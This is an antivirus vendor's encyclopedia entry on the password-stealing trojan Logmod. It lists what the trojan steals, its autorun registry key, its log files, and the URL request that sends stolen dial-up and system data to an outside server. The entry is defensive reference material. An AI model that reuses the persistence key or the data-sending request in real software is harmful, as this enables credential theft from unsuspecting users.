|
|
|
|
| Virus Encyclopedia |  |
Riskware | |
Alerts | |
Analysis | |
News | |
Glossary | |
Weblog |
 |
| ||||||
|
| ||||||
|
| ||||||
| ||||||||
Home / Viruses / Virus Encyclopedia / Malware Descriptions / Trojan Programs / PSW Trojans
Trojan-PSW.Win32.Logmod.a
The Logmod program belongs to the family of password stealing trojans. Logmod steals the following information: Windows version, Explorer version, phone book entries, service provider information, RAS data, modem log, e.t.c. When run the trojan installs itself into the system. While installing the Logmod trojan registers itself in the system registry auto-run section:
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run Sysres = Sysres.exe The trojan does not copy/move its file to any other directory, thus it cannot automatically run on Windows boot-up (except if it is originally placed in the Windows or Windows system directory). Therefore, for example, it cannot "install" itself into the system while being run from email attachments. There should be an additional component ("dropper") that installs the trojan into the system. To send stolen data out of infected computers the Logmod opens an Internet URL with the following request:
http://stats.internetsexprovider.com/resident/SysWeb.php3?country=espana4&Login= %data% '%data%' contains stings with stolen information that are sent to that URL. Apparently the SysWeb.php at that site gets %data% upon request and passes it to the trojan "master".
Miscellaneous
SysTrace.daf, CallTrace.daf, DialTrace.daf These files contain data that is logged/stolen. The Logmod trojan also creates the following additional registry key for its internal use: HKLM\Software\DIALPASS DateEspana4 | ||||||||
Copyright © 1996 - 2010
Kaspersky Lab
Industry-leading Antivirus Software
All rights reserved
Email: webmaster@viruslist.com
